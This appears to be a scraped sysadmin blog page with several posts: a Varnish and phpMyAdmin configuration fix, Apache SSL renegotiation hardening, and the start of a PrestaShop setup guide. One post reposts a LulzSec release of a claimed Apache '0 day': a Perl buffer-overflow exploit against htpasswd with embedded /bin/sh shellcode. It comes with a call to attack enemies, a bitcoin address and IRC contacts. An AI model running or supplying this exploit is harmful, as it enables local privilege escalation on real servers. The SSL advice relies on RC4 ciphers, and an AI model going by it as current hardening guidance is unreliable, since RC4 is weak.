Varnish & phpmyadmin

Hi guys,

Hope all of you know about Varnish, the http cache server. A very good and stable one.

But last week i had some issues regarding configuration of my phpmyadmin on it.

 

Phpmyadmin issue where :

Cannot start session without errors, please check errors given in your PHP and/or webserver log file and configure your PHP installation properly.

Eveywhere you’ll find this is an issue related to session temp directory configuration. FALSE. THIS IS BULLSHIT.

Here is the solution:

Firt of all you need to setup your varnish for the domain or the phpmyadmin directory not to be cached. I set this on a specific back office subdomain name for all my administration tasks (just restrict this access by ip AND passwd on htaccess btw).

Here is the related rules:

sub vcl_fetch {

        if (req.url ~ "XXXX.YYYYYY.TLD") {
                return(pass);
        }
}

Then you’ll have to configure your phpmyadmin directory. Software is not smart enough to understand it’s run behind  varnish, so he’ll try to redirect you to your backend server (which is, I HOPE, not available by public adress/port). So configure this directive « $cfg[‘PmaAbsoluteUri’] » swith your phpmyadmin public internet URL.
And then setup auth_type with « http ». Problem comes from « cookie » auth. I still didn’t resolv this issue but at least this configuration works !

 

 

$i = 0;
$i++;
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
/* Select mysql if your server does not have mysqli */
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['PmaAbsoluteUri'] = 'http://XXXXXXXXXXX/';

 

HF dudez.

, , , ,

 

You may have heard about the new DDOS tools released by THc yesterday exploiting an OLD CVE :

 

here is how to protect yourlsef from the vulnerability :

Just edit your SSL configuration files ( or all your vhost files, depend your configuration) as follows:

 

SSLVerifyDepth 4 # max number of depth
SSLVerifyClient none (ou require)
SSLCipherSuite RC4-SHA:RC4-MD5:HIGH:MEDIUM:!ADH:!DSS:!SSLv2:+3DES # Ciphers suite used in the renegociation
SSLProtocol all -SSLv2 # Let’s disable sslv2
SSLHonorCipherOrder on #using the order we just set

 

have fun @patching your apache configuration files !

, , , , , ,

Today the famous group just released one of the many 0day they’re using :

You got here the code :)

RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
 
. /$$                 /$$            /$$$$$$                    
.| $$                | $$           /$$__  $$                    
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$      
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$      
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!
 
.--    .-""-.
.   ) (     )
.  (   )   (
.     /     )
.    (_    _)                     0_,-.__
.      (_  )_                     |_.-._/
.       (    )                    |lulz..\    
.        (__)                     |__--_/          
.     |''   ``\                   |
.     | [Lulz] \                  |      /b/
.     |         \  ,,,---===?A`\  |  ,==y'
.   ___,,,,,---==""\        |M] \ | ;|\ |>
.           _   _   \   ___,|H,,---==""""bno,
.    o  O  (_) (_)   \ /          _     AWAW/
.                     /         _(+)_  dMM/
.      \@_,,,,,,---=="   \      \\|//  MW/
.--''''"                         ===  d/
.                                    //   SET SAIL FOR FAIL!
.                                    ,'_________________________
.   \    \    \     \               ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
.                         _____    ,'  ~~~   .-""-.~~~~~~  .-""-.
.      .-""-.           ///==---   /`-._ ..-'      -.__..-'
.            `-.__..-' =====\\\\\\ V/  .---\.
.                     ~~~~~~~~~~~~, _',--/_.\  .-""-.
.                            .-""-.___` --  \|         -.__..-
 


Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!

===========================================

#!/usr/bin/perl 
# 0 Day Apache Exploit
# LulzSecurity #AntiSec

$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". 
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 


$target = "/usr/local/apache/bin/htpasswd"; 
$retaddr = 0xbffffffa - length($shellcode) - length($target); 


print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 


local($ENV{'XXX'}) = $shellcode; 
$newret = pack('l', $retaddr); 
$buffer = "A" x 272; 
$buffer .= $newret x 4; 
$buffer .= " "; 
$buffer .= "B" x 290; 


exec("$target -nb $buffer");
, , ,

[link to french version below]

PrestaShop is an e-commerce solution known by his many uses through the world. By using PHP and object oriented programmation, it allows to be easily customizable by the common run of programmers, hackers or integrators.

Install mod_rewrite

Before everything, you will have to check if the mod_rewrite module is installed on your Apache. You can see that in a simple phpinfo().

If it is not installed, type (while being root):

Read the rest of this entry

, , , , , , , , , ,